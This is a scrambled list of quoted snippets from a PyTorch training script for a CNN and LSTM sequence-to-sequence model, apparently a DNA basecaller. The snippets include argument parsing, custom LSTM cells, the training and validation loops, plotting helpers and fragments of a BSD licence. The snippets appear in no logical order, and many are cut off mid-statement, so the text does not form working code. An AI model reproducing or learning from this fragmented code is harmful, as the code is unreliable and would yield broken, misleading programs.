"label=\"validation accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy vs. updates from validation set\")",
"enumerate(y_len): if len(matrix_param[p].shape) > 2: # and matrix_param[p].shape[1] == 1: # (256, 1,",
"weights=out12[4][0], gradients=out12[4][1]) pickle.dump(out12, open(save_files_path + \"{}.p\".format(fname), \"wb\" )) with PdfPages(save_files_path + \"{}.pdf\".format(fname)) as",
"2) ax.plot(np.arange(0, len(np.concatenate(np.array(list(acc_train.values()))))), [v*100 for v in np.concatenate(np.array(list(acc_train.values())))], label=\"training accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in",
"reserved. Redistribution and use in source and binary forms, with or without modification,",
"# unsort hiddens original_idx = original_idx.cpu() unsorted_idx_hiddens = original_idx.view(1, -1, 1).expand_as(hidden[0]) unsorted_hiddens1 =",
"type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--drop_prob', type=float, default=Range(0.0, 1.0), help=\"Dropout probability Encoder-CNN\") parser.add_argument(\"--batch_norm\",",
"hidden_size, bias=bias) self.h2h = nn.Linear(hidden_size, 4 * hidden_size, bias=bias) self.port = port def",
"out_decoder, labels_sorted, sorted_len_target # In[ ]: def get_train_loader_trainVal(tensor_x, sig_len, tensor_y, label_len, label10, batch_size,",
"out_size x seq_length output, sorted_labels, sorted_labels_len = model(inputs, seq_len, teacher_forcing_ratio, labels, lab_len, labels10,",
"plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy vs. updates\") if editD: ax = fig.add_subplot(1,",
"param.data[start:end].fill_(0.) print(start, end) model12 = model12.cuda(port) print(model12, next(model12.parameters()).is_cuda) if sgd: optimizer = optim.SGD(model12.parameters(),",
"return parser # Network # ----------- # * CNN-Encoder # * LSTM-Encoder #",
"of epochs\") parser.add_argument('-v', '--make_validation', type=int, default=1000, help=\"Make every n updates evaluation on the",
"* LSTM-Decoder # The Encoder # ----------- class LSTMCellEncoder(nn.Module): def __init__(self, input_size, hidden_size,",
"requires_grad=False) # batch_size x out_size x seq_length output_val, sorted_labels_val, sorted_labels_len_val = model(inputs_val, seq_len_val,",
"+= num_char_ref if editD: cer = float(total_ed) / total_num_chars if updates == 0:",
"self.attention: # attention self.attn = nn.Linear(self.hidden_dim * 4, 1) #self.attn = nn.Linear(self.hidden_dim *",
"1).cuda(self.port) # (batch, seq, feature), lstm_in_unroll, hidden = self.lstm_unroll(input, hidden) # [batch size,",
"y_len = [\"\\n\".join([\".\".join([x.split(\".\")[0], x.split(\".\")[1]]), x.split(\".\")[2]]) for x in y_len] df = pd.DataFrame(input, index=y_len,",
"= optim.Adam(model12.parameters(), lr=lr, weight_decay=weight_decay, betas=(0.9,0.999)) criterion = torch.nn.NLLLoss(ignore_index=5)#.cuda(port) print(f'The model has {count_parameters(model12):,} trainable",
"rem = divmod(end-start, 3600) minutes, seconds = divmod(rem, 60) print(\"=\" * 100) checkpoint",
"SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,",
"__init__(self, start, end): self.start = start self.end = end def __eq__(self, other): return",
"shown to the LSTM packed_seq = nn.utils.rnn.pack_padded_sequence(sorted_inputs, sorted_len.cpu().numpy(), batch_first=True) # Define the LSTM",
"writer.close() if earlyStopping: checkpoint = torch.load(file_name) model.load_state_dict(checkpoint[\"model\"]) return ([[dict_training_loss, dict_validation_loss, dict_training_acc, dict_validation_acc, dict_training_editd,",
"val_editd # early_stopping needs the validation loss to check if it has decresed,",
"= x.view(x.size(0), -1) # Linear mappings gates = self.i2h(x) + self.h2h(h) ingate, forgetgate,",
"svm.get_figure() figure.savefig(save_files_path + \"/heatmap_{}.pdf\".format(filename)) plt.clf() if split_LSTMbiases: y_len_biases = [\"\\n\".join([\".\".join([x.split(\".\")[0], x.split(\".\")[3]]), x.split(\".\")[2]]) for",
"0.5: if (running_acc_train / float(make_validation)) > 0.35 and teacher_forcing_ratio >= 0.25: # if",
"running_editd_train += ed # editd_iteration.append(ed2) # print(\"edit distance= {0:.4f}\".format((epoch_editd / float(iteration + 1))))",
"sorted_labels.view(-1) notpadded_index = reshaped_sorted_labels != 5 # indices of not padded elements loss",
"THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. \"\"\" import",
"num_layers=2, own_cell_decoder = False, bidirectional = False, port=1, attention=True, dropout=0): super(LSTMdecoder, self).__init__() self.input_dim",
"is what we'll initialise our hidden state as return (torch.zeros(self.num_layers, self.batch_size, self.hidden_dim).requires_grad_().cuda(self.port), torch.zeros(self.num_layers,",
"start_seq = True input_decoder = torch.zeros(batch_size, self.input_dim).cuda(self.port) # SOS token = 1 [batch",
"seq_length x input_size #### LSTM if (seq_len_cnn <= 0.).sum().item() > 0: # remove",
"of lstm_out: [seq_len, batch, output_dim] # shape of self.hidden: (a, b), where a",
"and binary forms, with or without modification, are permitted provided that the following",
"k: acc_val[k]) f = open(fname, \"w\") if editD: f.write(\"best performances on trainings set\\n\")",
"from torch.utils.tensorboard import SummaryWriter import itertools import seaborn as sns import pandas as",
"0.0 running_editd_train = 0.0 running_editd_val = 0.0 updates = 0 heatmap_g = None",
"sorted_len_target, labels_sorted, random_value, mode_type, beam_width) # seq_length x batch_size x out_size return out_decoder,",
"get_train_loader_trainVal(tensor_x, sig_len, tensor_y, label_len, label10, batch_size, shuffle=True): my_dataset = torch.utils.data.TensorDataset(tensor_x, tensor_y, sig_len, label_len,",
"nargs='?', const=True, default=False) parser.add_argument('--drop_prob', type=float, default=Range(0.0, 1.0), help=\"Dropout probability Encoder-CNN\") parser.add_argument(\"--batch_norm\", type=lambda x:bool(strtobool(x)),",
"import LabelEncoder from sklearn.preprocessing import OneHotEncoder from torch.utils.tensorboard import SummaryWriter import itertools import",
"pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_heatmap(dict_weights,save_files_path, filename, split_LSTMbiases = False): x_len = list(dict_weights.keys()) y_len",
"0 heatmap_g = None heatmap_w = None heatmap_g_b = None heatmap_w_b = None",
"in name and \"lstm\" in name and \"linear\" not in name: for b",
"ord=2) # forget gate start, end = n//4, n//2 input_biases[idx_b+1, idx] = np.linalg.norm(m[start:",
"y, teacher_forcing_ratio, hidden, true_y_len, y_class, random_value, mode_type, beam_width=1): # Forward pass through LSTM",
"bidirectional = bidir, port=port, attention=attention, dropout=dropout) model12 = Seq2Seq(cnn_encoder = CNN, lstm_encoder =",
"+ (ingate * cellgate) hy = outgate * F.tanh(cy) return hy, (hy, cy),",
"args.lstm_layers bidir = args.bi_lstm attention = args.attention dropout = args.dropout # CNN input_bias_cnn",
"[v*100 for v in list(acc_train.values())], label=\"training accuracy\") if validation: ax.plot(list(acc_val.keys()), [v*100 for v",
"data train_loader = get_train_loader_trainVal(input_x, signal_len, input_y, label_len, input_y10, batch_size=batch_size, shuffle=True) if val_ds !=",
"requires_grad=False) # batch_size x out_size x seq_length output, sorted_labels, sorted_labels_len = model(inputs, seq_len,",
"plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy vs. updates from trainings set\") if editD: ax",
"set\") ax = fig.add_subplot(1, 3, 2) ax.plot(np.arange(0, len(np.concatenate(np.array(list(acc_val.values()))))), [v*100 for v in np.concatenate(np.array(list(acc_val.values())))],",
"[batch size] = 32 is a good default value CNN = SimpleCNN(input_channel=1, output_channel=[cnn_out,cnn_out,",
"n//2, n # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(0.) print(start, end) model12 =",
"onehot[:, top1] = 1 # one hot encode input input_decoder = label if",
"\", updates, \", half of updates= \", int((len(train_loader) * n_epochs)*0.5)) # Backward pass",
"default=1, help=\"Number of layers in Encoder-LSTM\") parser.add_argument('--forget_bias_encoder', type=str, default=\"0\", help=\"Set forget gate bias",
"* hidden_size, bias=bias) self.port = port def reset_parameters(self): std = 1.0 / math.sqrt(self.hidden_size)",
"lab_len_val = data_val[3] batch_y10_val = data_val[4] inputs_val, labels_val, labels10_val = Variable(batch_x_val, requires_grad=False), Variable(batch_y_val,",
"#256 forget_bias = args.forget_bias_encoder forget_bias_decoder = args.forget_bias_decoder num_layers = args.lstm_layers bidir = args.bi_lstm",
"Variable(batch_y_val, requires_grad=False), Variable(batch_y10_val, requires_grad=False) # batch_size x out_size x seq_length output_val, sorted_labels_val, sorted_labels_len_val",
"self.hidden_dim, self.num_layers, batch_first=True) def init_hidden(self): # This is what we'll initialise our hidden",
"element = last one #print(true_y_len, true_y_len.size()) input_decoder = input_decoder[not_padded_batches, :] # get only",
"shape of lstm_out: [batch, seq_len, output_dim] # shape of self.hidden: (a, b), where",
"(reshaped_output_val[notpadded_index_val, :].argmax(1) == reshaped_sorted_labels_val[notpadded_index_val] ).sum().item() / reshaped_sorted_labels_val[notpadded_index_val].size(0) epoch_acc_val += acc_val running_acc_val += acc_val",
"self).__init__() self.input_dim = input_dim self.hidden_dim = hidden_dim self.batch_size = batch_size self.num_layers = num_layers",
"\"lstm_encoder\" in name: print(name,param.data.size()) n = param.size(0) # forget gate start, end =",
"outgate param.data[start:end].fill_(0.) print(start, end) # cellgate, outgate start, end = n//2, n #",
"teacher = args.tf_ratio reduced_TF = args.reduced_tf earlyStopping = args.early_stop patience_earlyStop = args.patience weight_decay",
"reduced_TF=True, make_validation=1000, mode=\"train\", shuffle=True, patience = 25, file_name=\"model\", earlyStopping=False, writer=\"\", editD=True, reduce_lr=False): #Print",
"nargs='+', type=int, default=[11, 11, 11], help=\"Kernel sizes in Encoder-CNN\") parser.add_argument(\"--dropout_cnn\", type=lambda x:bool(strtobool(x)), nargs='?',",
"self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else: self.lstm_unroll = nn.LSTM(self.input_dim, self.hidden_dim*2, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout)",
"hidden[1] h1 = torch.cat([hidden1[0:hidden1.size(0):2], hidden1[1:hidden1.size(0):2]], 2) h2 = torch.cat([hidden2[0:hidden2.size(0):2], hidden2[1:hidden2.size(0):2]], 2) hidden =",
"enumerate(train_loader): model.train() #Set the parameter gradients to zero optimizer.zero_grad() batch_x = data[0] batch_y",
"None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_error_accuarcy_iterations_val(input, pdf=None, editD=True): sns.set(font_scale=1) loss_val, acc_val, editd_val =",
"self.dropout=dropout # Define the LSTM layer self.lstm = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=self.bidirectional,",
"if earlyStopping: # initialize the early_stopping object early_stopping = EarlyStopping(patience=patience, verbose=True, delta=0.01, name=file_name,",
"trainNet( model12, train_ds = train_set, optimizer=optimizer, criterion=criterion, clipping_value=clipping_value, val_ds = val_set, batch_size=batch, n_epochs=epochs,",
"teacher_forcing_ratio, sorted_hiddens, sorted_len_target, labels_sorted, random_value, mode_type, beam_width) # seq_length x batch_size x out_size",
"label10, batch_size, shuffle=True): my_dataset = torch.utils.data.TensorDataset(tensor_x, tensor_y, sig_len, label_len, label10) # create your",
"None: val_loader = get_train_loader_trainVal(input_x_val, signal_len_val, input_y_val, label_len_val, input_y10_val, batch_size=batch_size, shuffle=True) if earlyStopping: #",
"0.0 running_editd_val = 0.0 print(\"=\" * 100) print(\"Epoch: {}/{}...\".format(epoch+1, n_epochs), \"Loss: {:.6f}...\".format(epoch_loss /",
"+= 4 y_len = [\"\\n\".join([\".\".join([x.split(\".\")[0], x.split(\".\")[1]]), x.split(\".\")[2]]) for x in y_len] df =",
"batch, output_dim] # shape of self.hidden: (a, b), where a and b both",
"if it has, it will make a checkpoint of the current model if",
"epoch == max(p.keys()): x = np.arange(0, len(p[epoch].detach().numpy())) # this locator puts ticks at",
"np.linalg.norm(m[start: end], ord=2) idx_b += 4 y_len = [\"\\n\".join([\".\".join([x.split(\".\")[0], x.split(\".\")[1]]), x.split(\".\")[2]]) for x",
"in Encoder-CNN\") parser.add_argument('--strides', nargs='+', type=int, default=[1, 1, 1], help=\"Strides in Encoder-CNN\") parser.add_argument('--kernel', nargs='+',",
"dict_training_acc2, dict_validation_acc2, dict_training_editd2, dict_validation_editd2], [dict_activations_in, dict_activations_forget, dict_activations_cell, dict_activations_out], [dict_activations_in_decoder, dict_activations_forget_decoder, dict_activations_cell_decoder, dict_activations_out_decoder], [dict_weights,",
"self.linear = nn.Linear(self.hidden_dim, self.output_dim) def forward(self, encoder_outputs, true_x_len, max_label_len, y, teacher_forcing_ratio, hidden, true_y_len,",
"model, optimizer, updates) if early_stopping.early_stop: print(\"Early stopping\") break if reduce_lr: scheduler.step(loss_val) updates +=1",
"epoch_loss_val += loss_val.item() running_loss_val += loss_val.item() acc_val = (reshaped_output_val[notpadded_index_val, :].argmax(1) == reshaped_sorted_labels_val[notpadded_index_val] ).sum().item()",
"updates) writer.add_scalar('Edit Distance/validation', cer, updates) #dict_training_editd2[updates] = running_editd_train #/ float(make_validation) dict_validation_editd2[updates] = cer",
"args.reduced_tf earlyStopping = args.early_stop patience_earlyStop = args.patience weight_decay = args.weight_decay #0.01 #0.01 clipping_value",
"and a few hundreds, e.g. [batch size] = 32 is a good default",
"dropout_probability = args.drop_prob call = args.call lr = args.learning_rate editD = args.editD sgd",
"updates from trainings set\") if editD: ax = fig.add_subplot(1, 3, 3) ax.plot(np.arange(0, len(np.concatenate(np.array(list(editd_train.values()))))),",
"30) print(\"epoch {}/{}\".format(epoch+1, n_epochs)) print(\"=\" * 30) total_train_loss = 0 loss_iteration = []",
"F.log_softmax(lstm_in_unroll, dim=1) # (batch_size*seq, out_dim) --> (batch_size, out_dim) #decide if we are going",
"cnn_encoder, lstm_encoder, lstm_decoder): super().__init__() self.cnn_encoder = cnn_encoder self.lstm_encoder = lstm_encoder self.lstm_decoder = lstm_decoder",
"+ \"{}_checkpoint.pt\".format(fname), earlyStopping=earlyStopping, patience=patience_earlyStop, writer=writer, editD=editD) end = time.time() hours, rem = divmod(end-start,",
"n_epochs)*0.5)) # Backward pass loss.backward() #clipping_value = 1 #arbitrary number of your choosing",
"total_num_chars = 0 with torch.no_grad(): for iteration_val, data_val in enumerate(val_loader): batch_x_val = data_val[0]",
"where a and b both have shape (num_layers, batch_size, hidden_dim). if self.bidirectional: hidden1",
"type=float, default=Range(0.0, 1.0), help=\"Dropout probability Encoder-LSTM\") parser.add_argument('-u', '--hidden_units', type=int, default=256, help=\"Number of hidden",
"Encoder-LSTM\") parser.add_argument('--forget_bias_encoder', type=str, default=\"0\", help=\"Set forget gate bias in Encoder-LSTM\") parser.add_argument('--forget_bias_decoder', type=str, default=\"0\",",
"= seq_len_cnn[negative_idx] in_lstm = in_lstm[negative_idx, : , :] # [batch, seq_len, input_dim] lab_len",
"= (seq*batch) # Target nicht one-hot encoden reshaped_output_val = output_val.view(-1, output_val.size(2)) reshaped_sorted_labels_val =",
"acc_train, acc_val, editd_train, editd_val = input[0], input[1], input[2], input[3], input[4], input[5] max_idx_train =",
"acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\ttrainings edit distance\\tvalidation edit distance\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val], acc_val[max_idx_val], loss_train[max_idx_val], loss_val[max_idx_val], editd_train[max_idx_val],",
"forget_bias_decoder != \"None\" and \"lstm_decoder\" in name and \"linear\" not in name: print(name,param.data.size())",
"pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_activations(input, pdf=None, print_epoch=50000, title=\"\"): sns.set(font_scale=1)",
"\"None\" and \"lstm_decoder\" in name and \"linear\" not in name: print(name,param.data.size()) n =",
"val_set[2].cuda(port), val_set[3].cuda(port), val_set[4].cuda(port), val_set[5].cuda(port)] print(\"train: \", train_set[0].size(), train_set[1].size(), train_set[2].size(), train_set[3].size(), train_set[4].size(), train_set[5].size()) print(\"validation:",
"reads, kernel size = 11 start = time.time() out12 = trainNet( model12, train_ds",
"nicht one-hot encoden reshaped_output = output.view(-1, output.size(2)) reshaped_sorted_labels = sorted_labels.view(-1) notpadded_index = reshaped_sorted_labels",
"is a good default value CNN = SimpleCNN(input_channel=1, output_channel=[cnn_out,cnn_out, cnn_out] , kernel_size=kernel, stride=strides,",
"distance\") if validation: ax.plot(list(editd_val.keys()), list(editd_val.values()), label=\"validation edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend()",
"(running_acc_train / float(make_validation)) > 0.35 and teacher_forcing_ratio >= 0.25: # if we have",
"from cnn import outputLen_Conv, outputLen_AvgPool, outputLen_MaxPool plt.switch_backend('agg') class Range(object): def __init__(self, start, end):",
"/ float(iteration_val + 1)), \"Val Accuracy: {:.6f}%...\".format((epoch_acc_val / float(iteration_val + 1)) * 100))",
"= torch.utils.data.DataLoader(my_dataset, batch_size=batch_size, num_workers=0, pin_memory=False, shuffle=shuffle) # create your dataloader return(train_loader) def convert_to_string(pred,",
"None heatmap_w_b = None counter_updates_teacherForcing = 0 old_ed = 0 if reduce_lr: scheduler",
"\"{}.pdf\".format(fname)) as pdf: plot_error_accuarcy(out12[1], pdf, editD=editD) bestPerformance2File(out12[1], save_files_path + \"best_performances_{}.txt\".format(fname), editD=editD) plot_error_accuarcy_iterations_train(out12[0], pdf,",
"as plt import matplotlib.ticker as ticker from matplotlib.backends.backend_pdf import PdfPages import math import",
"########################################### #### CNN #Forward pass, backward pass, optimize in_lstm, seq_len_cnn = self.cnn_encoder(inputs, seq_len)",
"1. Redistributions of source code must retain the above copyright notice, this list",
"OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. \"\"\"",
"p[epoch].detach().numpy(), label=\"update {}\".format(epoch), color=\"#000000\", alpha=0.8) else: ax.plot(np.arange(0, len(p[epoch].detach().numpy())), p[epoch].detach().numpy(), label=\"update {}\".format(epoch)) plt.xlabel(\"Time Steps\")",
"and use in source and binary forms, with or without modification, are permitted",
"token onehot = torch.zeros(len(top1), self.output_dim).cuda(self.port) onehot[:, top1] = 1 # one hot encode",
"this locator puts ticks at regular intervals if epoch == 0: ax.plot(np.arange(0, len(p[epoch].detach().numpy())),",
"plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates\") ax = fig.add_subplot(1, 3, 2) ax.plot(list(acc_train.keys()), [v*100",
"def plot_error_accuarcy_iterations_val(input, pdf=None, editD=True): sns.set(font_scale=1) loss_val, acc_val, editd_val = input[1], input[3], input[5] fig",
"vs. updates from validation set\") if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\")",
"= matrix_param[p].reshape((matrix_param[p].shape[0], -1)) else: m = matrix_param[p] input[idx_p, idx] = np.linalg.norm(m, ord=2) if",
"k: acc_train[k]) max_idx_val = max(acc_val, key=lambda k: acc_val[k]) f = open(fname, \"w\") if",
"const=True, default=False) parser.add_argument('--gradient_clip', default=\"None\", help=\"Gradient clipping\") # early stopping parser.add_argument(\"--early_stop\", type=lambda x:bool(strtobool(x)), nargs='?',",
"vs. updates\") if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_error_accuarcy_iterations_train(input, pdf=None,",
"top=2, hspace=0.2, wspace=0.2) ax = fig.add_subplot(1, 3, 1) ax.plot(np.arange(0, len(np.concatenate(np.array(list(loss_val.values()))))), np.concatenate(np.array(list(loss_val.values()))), label=\"validation error\")",
"ax.plot(np.arange(0, len(p[epoch].detach().numpy())), p[epoch].detach().numpy(), label=\"update {}\".format(epoch)) plt.xlabel(\"Time Steps\") plt.ylabel(\"Activation\") if i == 1: plt.legend(bbox_to_anchor=(1.05,",
"onehot # [batch size, out dim] return outputs, hidden # Sequence to sequence",
"p.keys(): if epoch % print_epoch == 0 or epoch == max(p.keys()): x =",
"forward(self, inputs, seq_len, teacher_forcing_ratio, labels=None, lab_len=None, labels10=None, max_label_len=None, mode_type=\"train\", beam_width=1): ########################################### ##### Encoder",
"loss_iteration.append(loss.item()) epoch_loss += loss.item() running_loss_train += loss.item() acc = (reshaped_output[notpadded_index, :].argmax(1) == reshaped_sorted_labels[notpadded_index]",
"ecoder_output = self.lstm_encoder(in_lstm, seq_len_cnn) ########################################### ##### Sorting ############################# ########################################### #### sort by decreasing",
"relative=True, decrease_lr_scheduler=reduce_lr) dict_activations_in = {} dict_activations_forget = {} dict_activations_cell = {} dict_activations_out =",
"= 0, n//4 # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(0.) print(start, end) #",
"make_argparser() args = parser.parse_args(argv[1:]) infile = args.input fname = args.output port = args.gpu_port",
"import math import torch.optim as optim from torch.utils.data import Dataset, DataLoader from sklearn.preprocessing",
"= bidirectional self.port=port self.attention = attention self.dropout = dropout # Define the LSTM",
"Sorting ############################# ########################################### #### sort by decreasing target length sorted_len_target, sorted_idx_target = lab_len.sort(0,",
"pd.DataFrame(input, index=y_len, columns=x_len) print(df.head()) sns.set(font_scale=0.4) svm = sns.heatmap(df, linewidths=0.0, edgecolor=\"none\") figure = svm.get_figure()",
"loss_val, acc_val, editd_val = input[1], input[3], input[5] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1, bottom=0,",
"lstm_in: [batch, seq_len, input_dim] # shape of lstm_out: [batch, seq_len, output_dim] # shape",
"* LSTM-Encoder # * LSTM-Decoder # The Encoder # ----------- class LSTMCellEncoder(nn.Module): def",
"end], ord=2) idx_b += 4 y_len = [\"\\n\".join([\".\".join([x.split(\".\")[0], x.split(\".\")[1]]), x.split(\".\")[2]]) for x in",
"ed = np.mean(np.array(convert_to_string(output.argmax(2), sorted_labels, sorted_labels_len))) # ed2 = ed # else: # ed",
"'/basecaller-modules') from early_stopping import EarlyStopping from cnn import SimpleCNN, BasicBlock, SimpleCNN_res from cnn",
"neagtive samples negative_idx = seq_len_cnn > 0 seq_len_cnn = seq_len_cnn[negative_idx] in_lstm = in_lstm[negative_idx,",
"import outputLen_Conv, outputLen_AvgPool, outputLen_MaxPool plt.switch_backend('agg') class Range(object): def __init__(self, start, end): self.start =",
"import SimpleCNN, BasicBlock, SimpleCNN_res from cnn import outputLen_Conv, outputLen_AvgPool, outputLen_MaxPool plt.switch_backend('agg') class Range(object):",
"the parameter gradients to zero optimizer.zero_grad() batch_x = data[0] batch_y = data[1] seq_len",
"notpadded_index = reshaped_sorted_labels != 5 # indices of not padded elements loss =",
"= input[0], input[2], input[4] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.2)",
"\\nSignal:\\n\") f.write(\"{}\\ttrue signal length: {}\\n\".format(val_set[0].size(), val_set[3])) f.write(\"\\nTarget:\\n\") f.write(\"{}\\ttrue target length: {}\\n\".format(val_set[1].size(), val_set[4])) f.write(\"\\nRead",
"CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR",
"teacher_forcing_ratio) print(\"shuffle=\", shuffle) if val_ds is not None: input_x_val = val_ds[0] input_y_val =",
"= nn.Linear(self.hidden_dim * 4, self.hidden_dim * 2) self.linear = nn.Linear(self.hidden_dim*2, self.output_dim) else: if",
"= args.dropout_cnn dropout_input = args.dropout_input dropout_probability = args.drop_prob call = args.call lr =",
"0 old_ed = 0 if reduce_lr: scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min') #Loop for n_epochs",
"= true_y_len.size(0) max_for = range(max_label_len) outputs = torch.zeros(max_label_len, batch_size, self.output_dim).cuda(self.port) # [max. target",
"own_cell_decoder=False, bidirectional = bidir, port=port, attention=attention, dropout=dropout) model12 = Seq2Seq(cnn_encoder = CNN, lstm_encoder",
"print_epoch == 0 or epoch == max(p.keys()): x = np.arange(0, len(p[epoch].detach().numpy())) # this",
"self.attention: self.lstm_unroll = nn.LSTM(self.input_dim+self.hidden_dim*2, self.hidden_dim*2, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else: self.lstm_unroll = nn.LSTM(self.input_dim,",
"# [max. target length, batch size, output dim] top1 = input_decoder.argmax(1) # get",
"indices of not padded elements loss_val = criterion(reshaped_output_val, reshaped_sorted_labels_val.long()) val_losses.append(loss_val.item()) epoch_loss_val += loss_val.item()",
"num_layers=num_layers, own_cell_encoder=False, bidirectional = bidir, port=port, dropout=dropout) lstm_dec = LSTMdecoder(input_dim=out_classes, hidden_dim = hidden,",
"return hy, (hy, cy), (torch.mean(ingate).cpu(), torch.mean(forgetgate).cpu(), torch.mean(cellgate).cpu(), torch.mean(outgate).cpu()) class LSTMdecoder(nn.Module): def __init__(self, input_dim,",
"as sns import pandas as pd import argparse from distutils.util import strtobool from",
"= data[0] batch_y = data[1] seq_len = data[2] lab_len = data[3] batch_y10 =",
"sorted_labels_len = model(inputs, seq_len, teacher_forcing_ratio, labels, lab_len, labels10, labels.size(1), mode) output = torch.transpose(output,",
"{} dict_training_editd = {} dict_validation_editd = {} dict_training_loss2 = {} dict_validation_loss2 = {}",
"seq_len, output_dim] # shape of self.hidden: (a, b), where a and b both",
"Copyright (c) 2021 (<EMAIL>) All rights reserved. Redistribution and use in source and",
"f.write(\"hyperparameters:\\n\") f.write(\"epochs={}, batch size={}, earlyStopping={}, patience={}, weight decay={}, clipping value={}, lr={}\\n\" .format(epochs, batch,",
"* c) + (ingate * cellgate) hy = outgate * F.tanh(cy) return hy,",
"parser # Network # ----------- # * CNN-Encoder # * LSTM-Encoder # *",
"{}/{}...\".format(epoch+1, n_epochs), \"Loss: {:.6f}...\".format(epoch_loss / float(iteration + 1)), \"Accuarcy: {:.6f}...\".format((epoch_acc / float(iteration +",
"parser.add_argument(\"--dropout_cnn\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument(\"--dropout_input\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--drop_prob',",
"0.0 running_editd_val = 0.0 updates = 0 heatmap_g = None heatmap_w = None",
"and teacher_forcing_ratio >= 0.5: if (running_acc_train / float(make_validation)) > 0.35 and teacher_forcing_ratio >=",
"early stopping\") parser.add_argument(\"--call\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument(\"--editD\", type=lambda x:bool(strtobool(x)), nargs='?', const=True,",
"Update encoder and decoder optimizer.step() if (val_ds != None) and (updates % make_validation",
"epoch_acc += acc running_acc_train += acc acc_iteration.append(acc) #if editD: # if updates %",
"if (seq_len_cnn <= 0.).sum().item() > 0: # remove neagtive samples negative_idx = seq_len_cnn",
"1 ax = fig.add_subplot(2, 2, i) for epoch in p.keys(): if epoch %",
"batch, input_dim] # undo the packing operation unpacked, unpacked_len = nn.utils.rnn.pad_packed_sequence(lstm_out, batch_first=True) #",
"0 epoch_loss_val = 0 epoch_acc_val = 0 epoch_editd_val = 0 epoch_editd = 0",
"# This is what we'll initialise our hidden state as return (torch.zeros(self.num_layers, self.batch_size,",
"= nn.Linear(hidden_size, 4 * hidden_size, bias=bias) self.port = port def reset_parameters(self): std =",
"put on position: seq, 0:true_batch_size, features # rest: seq, true_batch_size:max_seq_len, features filled with",
"padded sequences true_y_len = true_y_len[not_padded_batches] # remove smallest element = last one #print(true_y_len,",
"SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. \"\"\" import h5py",
"(ingate * cellgate) hy = outgate * F.tanh(cy) return hy, (hy, cy), (torch.mean(ingate).cpu(),torch.mean(forgetgate).cpu(),",
"operation unpacked, unpacked_len = nn.utils.rnn.pad_packed_sequence(lstm_out, batch_first=True) # targets oder batch sortieren # unsort",
"decrease_lr_scheduler=reduce_lr) dict_activations_in = {} dict_activations_forget = {} dict_activations_cell = {} dict_activations_out = {}",
"of the training iteration: print(\"===== HYPERPARAMETERS =====\") print(\"batch_size=\", batch_size) print(\"epochs=\", n_epochs) print(\"gradient clipping=\",",
"n_epochs for epoch in range(n_epochs): if earlyStopping and early_stopping.early_stop: # break epoch loop",
"seq_len) in_lstm = torch.transpose(in_lstm, 1, 2) # input for LSTM batch_size x seq_length",
"loss_val = criterion(reshaped_output_val, reshaped_sorted_labels_val.long()) val_losses.append(loss_val.item()) epoch_loss_val += loss_val.item() running_loss_val += loss_val.item() acc_val =",
"seq, 0:true_batch_size, features # rest: seq, true_batch_size:max_seq_len, features filled with 0 outputs[i, 0:input_decoder.size(0),",
"\"Hidden dimensions of encoder and decoder must be equal!\" assert lstm_encoder.num_layers == lstm_decoder.num_layers,",
"editD: cer = float(total_ed) / total_num_chars if updates == 0: writer.add_scalar('Loss/train', np.mean(loss_iteration), updates)",
"+ '/training_result_{}/'.format(fname) writer = SummaryWriter(script_dir + '/training_result_{}'.format(fname)) train_set = read_data[0] val_set = read_data[1]",
"train_set[4].cuda(port), train_set[5].cuda(port)] val_set = [val_set[0].cuda(port), val_set[1].cuda(port), val_set[2].cuda(port), val_set[3].cuda(port), val_set[4].cuda(port), val_set[5].cuda(port)] print(\"train: \", train_set[0].size(),",
"WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE",
"object inputs, labels, labels10 = Variable(batch_x, requires_grad=False), Variable(batch_y, requires_grad=False), Variable(batch_y10, requires_grad=False) # batch_size",
"editD=True): sns.set(font_scale=1) loss_train, acc_train, editd_train = input[0], input[2], input[4] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0,",
"= None heatmap_w_b = None counter_updates_teacherForcing = 0 old_ed = 0 if reduce_lr:",
